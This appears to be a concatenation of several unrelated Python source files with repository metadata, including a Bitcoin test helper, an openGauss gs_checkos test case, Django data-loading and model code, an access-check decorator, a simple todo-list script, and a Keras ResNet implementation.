def create_transaction(self, node, txid, to_address, amount):
inputs = [{ "txid" : txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
signresult = node.signrawtransaction(rawtx)
tx = CTransaction()
f = BytesIO(hex_str_to_bytes(signresult['hex']))
tx.deserialize(f)
return tx
def block_submit(self, node, txs, witness = False, accept = False):
block = create_block(self.tip, create_coinbase(self.lastblockheight + 1), self.lastblocktime + 1)
block.nVersion = 4
for tx in txs:
tx.rehash()
block.vtx.append(tx)
block.hashMerkleRoot = block.calc_merkle_root()
witness and add_witness_commitment(block)
block.rehash()
block.solve()
node.submitblock(bytes_to_hex_str(block.serialize(True)))
if (accept):
assert_equal(node.getbestblockhash(), block.hash)
self.tip = block.sha256
self.lastblockhash = block.hash
self.lastblocktime += 1
self.lastblockheight += 1
else:
assert_equal(node.getbestblockhash(), self.lastblockhash)
if __name__ == '__main__':
NULLDUMMYTest().main()
| true
| true
|
1c40e0fff52728bd0af1f0cfdd008ddd639c57ea
| 2,255
|
py
|
Python
|
openGaussBase/testcase/TOOLS/SERVER_TOOLS/gs_checkos/Opengauss_Function_Tools_gs_checkos_Case0006.py
|
opengauss-mirror/Yat
|
aef107a8304b94e5d99b4f1f36eb46755eb8919e
|
[
"MulanPSL-1.0"
] | null | null | null |
openGaussBase/testcase/TOOLS/SERVER_TOOLS/gs_checkos/Opengauss_Function_Tools_gs_checkos_Case0006.py
|
opengauss-mirror/Yat
|
aef107a8304b94e5d99b4f1f36eb46755eb8919e
|
[
"MulanPSL-1.0"
] | null | null | null |
openGaussBase/testcase/TOOLS/SERVER_TOOLS/gs_checkos/Opengauss_Function_Tools_gs_checkos_Case0006.py
|
opengauss-mirror/Yat
|
aef107a8304b94e5d99b4f1f36eb46755eb8919e
|
[
"MulanPSL-1.0"
] | null | null | null |
"""
Copyright (c) 2022 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
"""
Case Type : 服务端工具
Case Name : 设置会话流程
Description :
设置会话流程
Expect :
设置成功
History :
"""
import unittest
from yat.test import Node
from yat.test import macro
from testcase.utils.Constant import Constant
from testcase.utils.Logger import Logger
logger = Logger()
class Tools(unittest.TestCase):
def setUp(self):
logger.info('--------------Opengauss_Function_Tools_gs_checkos_Case0006start-------------------')
self.rootNode = Node('default')
self.Constant = Constant()
def test_server_tools(self):
        logger.info('------------------Set session process as root user------------------')
checkos_cmd = f'''
source {macro.DB_ENV_PATH}
gs_checkos -i B8
'''
logger.info(checkos_cmd)
msg = self.rootNode.sh(checkos_cmd).result()
logger.info(msg)
        logger.info('--------------Parse the execution result---------------')
        str_1 = msg.split('\n')
        logger.info(str_1)
        if len(str_1) > 2:
            str_list = str_1[1].split(':')
            logger.info(str_list)
            logger.info('--------------Verify the result---------------')
            self.assertEqual(len(str_list), 2, 'Result verification failed 1')
            self.assertEqual(str_list[0].strip(), 'B8. [ Set Session Process ]', 'Result verification failed 3')
            logger.info(str_list[0].strip())
            i = str_list[1].strip()
            self.assertTrue(i in ['Normal', 'Warning'], f'Status verification failed, current status: {i}')
        else:
            raise Exception("Unexpected parse result")
def tearDown(self):
        logger.info('--------------No environment cleanup required-------------------')
logger.info('------------------Opengauss_Function_Tools_gs_checkos_Case0006finish------------------')
| 34.166667
| 109
| 0.572062
|
import unittest
from yat.test import Node
from yat.test import macro
from testcase.utils.Constant import Constant
from testcase.utils.Logger import Logger
logger = Logger()
class Tools(unittest.TestCase):
def setUp(self):
logger.info('--------------Opengauss_Function_Tools_gs_checkos_Case0006start-------------------')
self.rootNode = Node('default')
self.Constant = Constant()
def test_server_tools(self):
        logger.info('------------------Set session process as root user------------------')
checkos_cmd = f'''
source {macro.DB_ENV_PATH}
gs_checkos -i B8
'''
logger.info(checkos_cmd)
msg = self.rootNode.sh(checkos_cmd).result()
logger.info(msg)
        logger.info('--------------Parse the execution result---------------')
        str_1 = msg.split('\n')
        logger.info(str_1)
        if len(str_1) > 2:
            str_list = str_1[1].split(':')
            logger.info(str_list)
            logger.info('--------------Verify the result---------------')
            self.assertEqual(len(str_list), 2, 'Result verification failed 1')
            self.assertEqual(str_list[0].strip(), 'B8. [ Set Session Process ]', 'Result verification failed 3')
            logger.info(str_list[0].strip())
            i = str_list[1].strip()
            self.assertTrue(i in ['Normal', 'Warning'], f'Status verification failed, current status: {i}')
        else:
            raise Exception("Unexpected parse result")
def tearDown(self):
        logger.info('--------------No environment cleanup required-------------------')
logger.info('------------------Opengauss_Function_Tools_gs_checkos_Case0006finish------------------')
| true
| true
|
1c40e117ad75d54eeb6b012db34f68dbff01bc78
| 1,734
|
py
|
Python
|
tool_box/conf_auto_fill/pre_field_info_add.py
|
diudiu/featurefactory
|
ee02ad9e3ea66e2eeafe6e11859801f0420c7d9e
|
[
"MIT"
] | null | null | null |
tool_box/conf_auto_fill/pre_field_info_add.py
|
diudiu/featurefactory
|
ee02ad9e3ea66e2eeafe6e11859801f0420c7d9e
|
[
"MIT"
] | null | null | null |
tool_box/conf_auto_fill/pre_field_info_add.py
|
diudiu/featurefactory
|
ee02ad9e3ea66e2eeafe6e11859801f0420c7d9e
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
"""
License SYPH-L.
Copyright (c) 2013- SYPH(Shaohan Niu), All Rights Reserved.
-----------------------------------------------------------
Author: S.JunPeng
Date: 2016/12/26
Change Activity:
"""
import os
import sys
import xlrd
home_path = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
sys.path.append(home_path)
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'featurefactory.settings')
import django
django.setup()
from apps.etl.models import PreFieldInfo
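# Expected spreadsheet layout (row 0 is a header and is skipped):
# column 0: id, 1: field_name, 2: field_name_cn, 3: source, 4: path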
def load_field_info_from_xls(file_path):
field_info_conf_list = []
xls = xlrd.open_workbook(file_path)
sheet1 = xls.sheets()[0]
for row_num in range(sheet1.nrows):
if row_num == 0:
continue
row = sheet1.row_values(row_num)
feature_conf = {
'id': int(row[0]),
'field_name': row[1],
'field_name_cn': row[2],
'source': row[3],
'path': row[4],
}
field_info_conf_list.append(feature_conf)
return field_info_conf_list
def init_feature_field():
all_feature_conf = load_field_info_from_xls('pre_field_info.xlsx')
for feature_conf in all_feature_conf:
if PreFieldInfo.objects.filter(
field_name=feature_conf['field_name'],
).count() > 0:
continue
else:
pfi = PreFieldInfo(
id=feature_conf['id'],
field_name=feature_conf['field_name'],
field_name_cn=feature_conf['field_name_cn'],
source=feature_conf['source'],
path=feature_conf['path'],
)
pfi.save()
if __name__ == '__main__':
init_feature_field()
| 26.676923
| 74
| 0.586505
|
import os
import sys
import xlrd
home_path = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
sys.path.append(home_path)
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'featurefactory.settings')
import django
django.setup()
from apps.etl.models import PreFieldInfo
def load_field_info_from_xls(file_path):
field_info_conf_list = []
xls = xlrd.open_workbook(file_path)
sheet1 = xls.sheets()[0]
for row_num in range(sheet1.nrows):
if row_num == 0:
continue
row = sheet1.row_values(row_num)
feature_conf = {
'id': int(row[0]),
'field_name': row[1],
'field_name_cn': row[2],
'source': row[3],
'path': row[4],
}
field_info_conf_list.append(feature_conf)
return field_info_conf_list
def init_feature_field():
all_feature_conf = load_field_info_from_xls('pre_field_info.xlsx')
for feature_conf in all_feature_conf:
if PreFieldInfo.objects.filter(
field_name=feature_conf['field_name'],
).count() > 0:
continue
else:
pfi = PreFieldInfo(
id=feature_conf['id'],
field_name=feature_conf['field_name'],
field_name_cn=feature_conf['field_name_cn'],
source=feature_conf['source'],
path=feature_conf['path'],
)
pfi.save()
if __name__ == '__main__':
init_feature_field()
| true
| true
|
1c40e1d1cb6ec185d05aa5e64e876a4d54ae1721
| 1,805
|
py
|
Python
|
kokemomo/plugins/engine/controller/km_access_check.py
|
Kokemomo/Kokemomo
|
614504dc49b2f509b25c9ec2229f4438db73bab7
|
[
"MIT"
] | 4
|
2016-06-12T13:19:23.000Z
|
2020-01-29T09:46:15.000Z
|
kokemomo/plugins/engine/controller/km_access_check.py
|
Kokemomo/Kokemomo
|
614504dc49b2f509b25c9ec2229f4438db73bab7
|
[
"MIT"
] | 67
|
2015-09-10T04:28:33.000Z
|
2019-09-19T09:08:11.000Z
|
kokemomo/plugins/engine/controller/km_access_check.py
|
Kokemomo/Kokemomo
|
614504dc49b2f509b25c9ec2229f4438db73bab7
|
[
"MIT"
] | 2
|
2016-06-13T11:20:42.000Z
|
2016-07-22T07:44:31.000Z
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
from functools import wraps
from kokemomo.settings import SETTINGS
from kokemomo.plugins.engine.model.km_user_table import KMUser
from kokemomo.plugins.engine.model.km_group_table import KMGroup
from kokemomo.plugins.engine.model.km_role_table import KMRole
from .km_session_manager import get_value_to_session
"""
Access check class for KOKEMOMO.
It provides as a decorator each check processing.
"""
__author__ = 'hiroki'
from kokemomo.plugins.engine.model.km_storage import storage
def access_check(request):
"""
Check to see if you can access to the target page.
:param request:
:return:
"""
def _access_check(callback):
@wraps(callback)
def wrapper(*args, **kwargs):
user_id = get_value_to_session(request, 'user_id')
if user_id is not None:
user = KMUser.get(user_id)
user_id = user.id
role = KMRole(user_id)
if check_target(request, role):
return callback(*args, **kwargs)
else:
                    # TODO: redirect to an error page when an exception is thrown
return "<p>Access is not allowed!</p>"
return wrapper
return _access_check
def check_target(request, role):
paths = request.path.split('/')
path = '/' + paths[1]
is_target = False
size = len(paths)
if size > 1 and role.target == path: # application scope
is_target = True
# function scope
elif size > 3 and role.target == '/'.join([path, paths[2]]):
is_target = True
# sub function scope
elif size > 5 and role.target == '/'.join([path, paths[2], paths[3]]):
is_target = True
if is_target and not role.is_allow:
return False
return True
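# Minimal usage sketch (the route path and handler name are hypothetical):
#   @route('/engine/top')
#   @access_check(request)
#   def top():
#       ...
# Note: when no 'user_id' is stored in the session, the wrapper falls through
# and implicitly returns None.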
| 27.769231
| 74
| 0.629363
|
from functools import wraps
from kokemomo.settings import SETTINGS
from kokemomo.plugins.engine.model.km_user_table import KMUser
from kokemomo.plugins.engine.model.km_group_table import KMGroup
from kokemomo.plugins.engine.model.km_role_table import KMRole
from .km_session_manager import get_value_to_session
__author__ = 'hiroki'
from kokemomo.plugins.engine.model.km_storage import storage
def access_check(request):
def _access_check(callback):
@wraps(callback)
def wrapper(*args, **kwargs):
user_id = get_value_to_session(request, 'user_id')
if user_id is not None:
user = KMUser.get(user_id)
user_id = user.id
role = KMRole(user_id)
if check_target(request, role):
return callback(*args, **kwargs)
else:
return "<p>Access is not allowed!</p>"
return wrapper
return _access_check
def check_target(request, role):
paths = request.path.split('/')
path = '/' + paths[1]
is_target = False
size = len(paths)
if size > 1 and role.target == path:
is_target = True
elif size > 3 and role.target == '/'.join([path, paths[2]]):
is_target = True
elif size > 5 and role.target == '/'.join([path, paths[2], paths[3]]):
is_target = True
if is_target and not role.is_allow:
return False
return True
| true
| true
|
1c40e30cd61d7c7f4fac7d007a8b7b4a5d1ec687
| 1,159
|
py
|
Python
|
todoList.py
|
G3Code-CS/Python2-follow-along
|
267ca69e9bd90e3ccffebf8417a371779e8a3575
|
[
"MIT"
] | null | null | null |
todoList.py
|
G3Code-CS/Python2-follow-along
|
267ca69e9bd90e3ccffebf8417a371779e8a3575
|
[
"MIT"
] | null | null | null |
todoList.py
|
G3Code-CS/Python2-follow-along
|
267ca69e9bd90e3ccffebf8417a371779e8a3575
|
[
"MIT"
] | null | null | null |
class TodoList:
def __init__(self, name):
self.name=name
self.items=[]
def __str__(self):
return f"{self.name}: {self.items}"
def __repr__(self):
return f"TodoList({repr(self.name)})"
quit = False
all_lists = []
current_list = None
while not quit:
    # Get the input from the user
command = input(f"(C)reate a new list\n(S)elect a list ({all_lists})\n(A)dd an item\n(Q)uit\nCommand : ")
    command = command.lower().strip()[:1]  # [:1] avoids an IndexError on empty input
if command == 'q': # quit
quit = True
elif command == 'c': # create
name = input("Enter list name :").strip()
new_list = TodoList(name)
all_lists.append(new_list)
print(all_lists)
elif command == 's': # Select
name = input("Enter list name:").strip()
named_list = None
for l in all_lists:
if l.name == name:
named_list = l
break
        if named_list is None:
            print(f"No such list named {name}")
        else:
            current_list = named_list
            print(f"Current selected list is ({current_list})")
    elif command == 'a': # Add an item to the currently selected list
        if current_list is None:
            print("Select a list first")
        else:
            item = input("Enter item :").strip()
            current_list.items.append(item)
            print(current_list)
| 25.195652
| 109
| 0.543572
|
class TodoList:
def __init__(self, name):
self.name=name
self.items=[]
def __str__(self):
return f"{self.name}: {self.items}"
def __repr__(self):
return f"TodoList({repr(self.name)})"
quit = False
all_lists = []
current_list = None
while not quit:
command = input(f"(C)reate a new list\n(S)elect a list ({all_lists})\n(A)dd an item\n(Q)uit\nCommand : ")
    command = command.lower().strip()[:1]
if command == 'q':
quit = True
elif command == 'c':
name = input("Enter list name :").strip()
new_list = TodoList(name)
all_lists.append(new_list)
print(all_lists)
elif command == 's':
name = input("Enter list name:").strip()
named_list = None
for l in all_lists:
if l.name == name:
named_list = l
break
        if named_list is None:
            print(f"No such list named {name}")
        else:
            current_list = named_list
            print(f"Current selected list is ({current_list})")
    elif command == 'a':
        if current_list is None:
            print("Select a list first")
        else:
            item = input("Enter item :").strip()
            current_list.items.append(item)
            print(current_list)
| true
| true
|
1c40e5a38c227ab144e1e0c27c22be55c55890a2
| 1,333
|
py
|
Python
|
sgi/academico/models/aluno.py
|
jorgevilaca82/SGI
|
c3f13d9e3e8f04377d9e23636dc8e35ed5ace35a
|
[
"MIT"
] | null | null | null |
sgi/academico/models/aluno.py
|
jorgevilaca82/SGI
|
c3f13d9e3e8f04377d9e23636dc8e35ed5ace35a
|
[
"MIT"
] | 8
|
2019-12-07T13:13:34.000Z
|
2021-09-02T03:07:25.000Z
|
sgi/academico/models/aluno.py
|
jorgevilaca82/SGI
|
c3f13d9e3e8f04377d9e23636dc8e35ed5ace35a
|
[
"MIT"
] | null | null | null |
from enum import IntEnum, auto
from django.db import models
from django.utils.translation import gettext_lazy as _
from sgi.base import models as bm
class Aluno(bm.PessoaFisica):
"""
A Pessoa Física só se torna um aluno quando está devidamente
associada um curso. Uma Pessoa Física pode ser aluno de mais de um curso,
mas nunca mais que dois e sem conflito de turnos
"""
class Status(IntEnum):
MATRICULADO = auto()
EVADIDO = auto()
TRANCADO = auto()
JUBILADO = auto()
CANCELADO = auto()
EGRESSO = auto()
FORMADO = auto()
AFASTADO = auto()
FALECIDO = auto()
ALUNO_STATUS_CHOICES = (
(Status.MATRICULADO.value, _("Matriculado")),
(Status.EVADIDO.value, _("Evadido")),
(Status.TRANCADO.value, _("Trancado")),
(Status.JUBILADO.value, _("Jubilado")),
(Status.CANCELADO.value, _("Cancelado")),
(Status.EGRESSO.value, _("Egresso")),
(Status.FORMADO.value, _("Formado")),
(Status.AFASTADO.value, _("Afastado")),
(Status.FALECIDO.value, _("Falecido")),
)
status = models.IntegerField(choices=ALUNO_STATUS_CHOICES)
    # RA - Registro de Aluno (student registration identifier)
ra = models.CharField(max_length=20, default="", editable=False, unique=True)
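    # Usage sketch (hypothetical query):
    #   Aluno.objects.filter(status=Aluno.Status.MATRICULADO.value)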
| 31
| 81
| 0.634659
|
from enum import IntEnum, auto
from django.db import models
from django.utils.translation import gettext_lazy as _
from sgi.base import models as bm
class Aluno(bm.PessoaFisica):
class Status(IntEnum):
MATRICULADO = auto()
EVADIDO = auto()
TRANCADO = auto()
JUBILADO = auto()
CANCELADO = auto()
EGRESSO = auto()
FORMADO = auto()
AFASTADO = auto()
FALECIDO = auto()
ALUNO_STATUS_CHOICES = (
(Status.MATRICULADO.value, _("Matriculado")),
(Status.EVADIDO.value, _("Evadido")),
(Status.TRANCADO.value, _("Trancado")),
(Status.JUBILADO.value, _("Jubilado")),
(Status.CANCELADO.value, _("Cancelado")),
(Status.EGRESSO.value, _("Egresso")),
(Status.FORMADO.value, _("Formado")),
(Status.AFASTADO.value, _("Afastado")),
(Status.FALECIDO.value, _("Falecido")),
)
status = models.IntegerField(choices=ALUNO_STATUS_CHOICES)
ra = models.CharField(max_length=20, default="", editable=False, unique=True)
| true
| true
|
1c40e64a01511123306d104ac282830293f3b951
| 14,127
|
py
|
Python
|
classification_models/models/resnet.py
|
NazaninTafreshi/classification_models
|
a953e96614ef2211c654c625bbf968c2e5d04fb9
|
[
"MIT"
] | null | null | null |
classification_models/models/resnet.py
|
NazaninTafreshi/classification_models
|
a953e96614ef2211c654c625bbf968c2e5d04fb9
|
[
"MIT"
] | null | null | null |
classification_models/models/resnet.py
|
NazaninTafreshi/classification_models
|
a953e96614ef2211c654c625bbf968c2e5d04fb9
|
[
"MIT"
] | null | null | null |
import os
import collections
from ._common_blocks import ChannelSE
from .. import get_submodules_from_kwargs
from ..weights import load_model_weights
backend = None
layers = None
models = None
keras_utils = None
ModelParams = collections.namedtuple(
'ModelParams',
['model_name', 'repetitions', 'residual_block', 'attention']
)
# -------------------------------------------------------------------------
# Helpers functions
# -------------------------------------------------------------------------
def handle_block_names(stage, block):
name_base = 'stage{}_unit{}_'.format(stage + 1, block + 1)
conv_name = name_base + 'conv'
bn_name = name_base + 'bn'
relu_name = name_base + 'relu'
sc_name = name_base + 'sc'
return conv_name, bn_name, relu_name, sc_name
def get_conv_params(**params):
default_conv_params = {
'kernel_initializer': 'he_uniform',
'use_bias': False,
'padding': 'valid',
}
default_conv_params.update(params)
return default_conv_params
def get_bn_params(**params):
axis = 3 if backend.image_data_format() == 'channels_last' else 1
default_bn_params = {
'axis': axis,
'momentum': 0.99,
'epsilon': 2e-5,
'center': True,
'scale': True,
}
default_bn_params.update(params)
return default_bn_params
# -------------------------------------------------------------------------
# Residual blocks
# -------------------------------------------------------------------------
def residual_conv_block(filters, stage, block, strides=(1, 1), attention=None, cut='pre'):
"""The identity block is the block that has no conv layer at shortcut.
# Arguments
input_tensor: input tensor
kernel_size: default 3, the kernel size of
middle conv layer at main path
filters: list of integers, the filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
cut: one of 'pre', 'post'. used to decide where skip connection is taken
# Returns
Output tensor for the block.
"""
def layer(input_tensor):
# get params and names of layers
conv_params = get_conv_params()
bn_params = get_bn_params()
conv_name, bn_name, relu_name, sc_name = handle_block_names(stage, block)
x = layers.BatchNormalization(name=bn_name + '1', **bn_params)(input_tensor)
x = layers.Activation('relu', name=relu_name + '1')(x)
# defining shortcut connection
if cut == 'pre':
shortcut = input_tensor
elif cut == 'post':
shortcut = layers.Conv2D(filters, (1, 1), name=sc_name, strides=strides, **conv_params)(x)
else:
raise ValueError('Cut type not in ["pre", "post"]')
# continue with convolution layers
x = layers.ZeroPadding2D(padding=(1, 1))(x)
x = layers.Conv2D(filters, (3, 3), strides=strides, name=conv_name + '1', **conv_params)(x)
x = layers.BatchNormalization(name=bn_name + '2', **bn_params)(x)
x = layers.Activation('relu', name=relu_name + '2')(x)
x = layers.ZeroPadding2D(padding=(1, 1))(x)
x = layers.Conv2D(filters, (3, 3), name=conv_name + '2', **conv_params)(x)
# use attention block if defined
if attention is not None:
x = attention(x)
# add residual connection
x = layers.Add()([x, shortcut])
return x
return layer
def residual_bottleneck_block(filters, stage, block, strides=None, attention=None, cut='pre'):
"""The identity block is the block that has no conv layer at shortcut.
# Arguments
input_tensor: input tensor
kernel_size: default 3, the kernel size of
middle conv layer at main path
filters: list of integers, the filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
cut: one of 'pre', 'post'. used to decide where skip connection is taken
# Returns
Output tensor for the block.
"""
def layer(input_tensor):
# get params and names of layers
conv_params = get_conv_params()
bn_params = get_bn_params()
conv_name, bn_name, relu_name, sc_name = handle_block_names(stage, block)
x = layers.BatchNormalization(name=bn_name + '1', **bn_params)(input_tensor)
x = layers.Activation('relu', name=relu_name + '1')(x)
# defining shortcut connection
if cut == 'pre':
shortcut = input_tensor
elif cut == 'post':
shortcut = layers.Conv2D(filters * 4, (1, 1), name=sc_name, strides=strides, **conv_params)(x)
else:
raise ValueError('Cut type not in ["pre", "post"]')
# continue with convolution layers
x = layers.Conv2D(filters, (1, 1), name=conv_name + '1', **conv_params)(x)
x = layers.BatchNormalization(name=bn_name + '2', **bn_params)(x)
x = layers.Activation('relu', name=relu_name + '2')(x)
x = layers.ZeroPadding2D(padding=(1, 1))(x)
x = layers.Conv2D(filters, (3, 3), strides=strides, name=conv_name + '2', **conv_params)(x)
x = layers.BatchNormalization(name=bn_name + '3', **bn_params)(x)
x = layers.Activation('relu', name=relu_name + '3')(x)
x = layers.Conv2D(filters * 4, (1, 1), name=conv_name + '3', **conv_params)(x)
# use attention block if defined
if attention is not None:
x = attention(x)
# add residual connection
x = layers.Add()([x, shortcut])
return x
return layer
# -------------------------------------------------------------------------
# Residual Model Builder
# -------------------------------------------------------------------------
def ResNet(model_params, input_shape=None, input_tensor=None, include_top=True,
classes=1000, weights='imagenet', **kwargs):
"""Instantiates the ResNet, SEResNet architecture.
Optionally loads weights pre-trained on ImageNet.
Note that the data format convention used by the model is
the one specified in your Keras config at `~/.keras/keras.json`.
    Args:
        model_params: ModelParams namedtuple describing the architecture to build.
include_top: whether to include the fully-connected
layer at the top of the network.
weights: one of `None` (random initialization),
'imagenet' (pre-training on ImageNet),
or the path to the weights file to be loaded.
input_tensor: optional Keras tensor
(i.e. output of `layers.Input()`)
to use as image input for the model.
        input_shape: optional shape tuple, only to be specified
            if `include_top` is False (otherwise the input shape
            has to be `(224, 224, 3)` (with `channels_last` data format)
            or `(3, 224, 224)` (with `channels_first` data format)).
            It should have exactly 3 input channels.
classes: optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified.
Returns:
A Keras model instance.
Raises:
ValueError: in case of invalid argument for `weights`,
or invalid input shape.
"""
global backend, layers, models, keras_utils
backend, layers, models, keras_utils = get_submodules_from_kwargs(kwargs)
if input_tensor is None:
img_input = layers.Input(shape=input_shape, name='data')
else:
if not backend.is_keras_tensor(input_tensor):
img_input = layers.Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
# choose residual block type
ResidualBlock = model_params.residual_block
if model_params.attention:
Attention = model_params.attention(**kwargs)
else:
Attention = None
# get parameters for model layers
no_scale_bn_params = get_bn_params(scale=False)
bn_params = get_bn_params()
conv_params = get_conv_params()
init_filters = 64
print("Building custom resnet model")
# resnet bottom
x = layers.BatchNormalization(name='bn_data', **no_scale_bn_params)(img_input)
x = layers.ZeroPadding2D(padding=(1, 1))(x)
x = layers.Conv2D(init_filters, (3, 3), strides=(1, 1), name='conv0', **conv_params)(x)
# x = layers.Conv2D(init_filters, (3, 3), strides=(1, 1), name='conv0', **conv_params)(x)
x = layers.BatchNormalization(name='bn0', **bn_params)(x)
x = layers.Activation('relu', name='relu0')(x)
x = layers.ZeroPadding2D(padding=(1, 1))(x)
# x = layers.MaxPooling2D((3, 3), strides=(2, 2), padding='valid', name='pooling0')(x)
# resnet body
for stage, rep in enumerate(model_params.repetitions):
for block in range(rep):
filters = init_filters * (2 ** stage)
# first block of first stage without strides because we have maxpooling before
if block == 0 and stage == 0:
x = ResidualBlock(filters, stage, block, strides=(1, 1),
cut='post', attention=Attention)(x)
elif block == 0:
x = ResidualBlock(filters, stage, block, strides=(2, 2),
cut='post', attention=Attention)(x)
else:
x = ResidualBlock(filters, stage, block, strides=(1, 1),
cut='pre', attention=Attention)(x)
x = layers.BatchNormalization(name='bn1', **bn_params)(x)
x = layers.Activation('relu', name='relu1')(x)
# resnet top
if include_top:
x = layers.GlobalAveragePooling2D(name='pool1')(x)
x = layers.Dense(classes, name='fc1')(x)
x = layers.Activation('softmax', name='softmax')(x)
# Ensure that the model takes into account any potential predecessors of `input_tensor`.
if input_tensor is not None:
inputs = keras_utils.get_source_inputs(input_tensor)
else:
inputs = img_input
# Create model.
model = models.Model(inputs, x)
if weights:
if type(weights) == str and os.path.exists(weights):
model.load_weights(weights)
else:
load_model_weights(model, model_params.model_name,
weights, classes, include_top, **kwargs)
return model
# -------------------------------------------------------------------------
# Residual Models
# -------------------------------------------------------------------------
MODELS_PARAMS = {
'resnet18': ModelParams('resnet18', (2, 2, 2, 2), residual_conv_block, None),
'resnet34': ModelParams('resnet34', (3, 4, 6, 3), residual_conv_block, None),
'resnet50': ModelParams('resnet50', (3, 4, 6, 3), residual_bottleneck_block, None),
'resnet101': ModelParams('resnet101', (3, 4, 23, 3), residual_bottleneck_block, None),
'resnet152': ModelParams('resnet152', (3, 8, 36, 3), residual_bottleneck_block, None),
'seresnet18': ModelParams('seresnet18', (2, 2, 2, 2), residual_conv_block, ChannelSE),
'seresnet34': ModelParams('seresnet34', (3, 4, 6, 3), residual_conv_block, ChannelSE),
}
def ResNet18(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet18'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def ResNet34(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet34'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def ResNet50(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet50'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def ResNet101(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet101'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def ResNet152(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet152'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def SEResNet18(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['seresnet18'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def SEResNet34(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['seresnet34'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def preprocess_input(x, **kwargs):
return x
setattr(ResNet18, '__doc__', ResNet.__doc__)
setattr(ResNet34, '__doc__', ResNet.__doc__)
setattr(ResNet50, '__doc__', ResNet.__doc__)
setattr(ResNet101, '__doc__', ResNet.__doc__)
setattr(ResNet152, '__doc__', ResNet.__doc__)
setattr(SEResNet18, '__doc__', ResNet.__doc__)
setattr(SEResNet34, '__doc__', ResNet.__doc__)
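# Usage sketch (hedged: backend/layers/models/utils submodules must be supplied
# via kwargs for get_submodules_from_kwargs; the values below are illustrative):
#   import keras
#   model = ResNet18(input_shape=(224, 224, 3), weights=None, classes=10,
#                    backend=keras.backend, layers=keras.layers,
#                    models=keras.models, utils=keras.utils)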
| 35.494975
| 108
| 0.609825
|
import os
import collections
from ._common_blocks import ChannelSE
from .. import get_submodules_from_kwargs
from ..weights import load_model_weights
backend = None
layers = None
models = None
keras_utils = None
ModelParams = collections.namedtuple(
'ModelParams',
['model_name', 'repetitions', 'residual_block', 'attention']
)
def handle_block_names(stage, block):
name_base = 'stage{}_unit{}_'.format(stage + 1, block + 1)
conv_name = name_base + 'conv'
bn_name = name_base + 'bn'
relu_name = name_base + 'relu'
sc_name = name_base + 'sc'
return conv_name, bn_name, relu_name, sc_name
def get_conv_params(**params):
default_conv_params = {
'kernel_initializer': 'he_uniform',
'use_bias': False,
'padding': 'valid',
}
default_conv_params.update(params)
return default_conv_params
def get_bn_params(**params):
axis = 3 if backend.image_data_format() == 'channels_last' else 1
default_bn_params = {
'axis': axis,
'momentum': 0.99,
'epsilon': 2e-5,
'center': True,
'scale': True,
}
default_bn_params.update(params)
return default_bn_params
def residual_conv_block(filters, stage, block, strides=(1, 1), attention=None, cut='pre'):
def layer(input_tensor):
conv_params = get_conv_params()
bn_params = get_bn_params()
conv_name, bn_name, relu_name, sc_name = handle_block_names(stage, block)
x = layers.BatchNormalization(name=bn_name + '1', **bn_params)(input_tensor)
x = layers.Activation('relu', name=relu_name + '1')(x)
if cut == 'pre':
shortcut = input_tensor
elif cut == 'post':
shortcut = layers.Conv2D(filters, (1, 1), name=sc_name, strides=strides, **conv_params)(x)
else:
raise ValueError('Cut type not in ["pre", "post"]')
x = layers.ZeroPadding2D(padding=(1, 1))(x)
x = layers.Conv2D(filters, (3, 3), strides=strides, name=conv_name + '1', **conv_params)(x)
x = layers.BatchNormalization(name=bn_name + '2', **bn_params)(x)
x = layers.Activation('relu', name=relu_name + '2')(x)
x = layers.ZeroPadding2D(padding=(1, 1))(x)
x = layers.Conv2D(filters, (3, 3), name=conv_name + '2', **conv_params)(x)
if attention is not None:
x = attention(x)
x = layers.Add()([x, shortcut])
return x
return layer
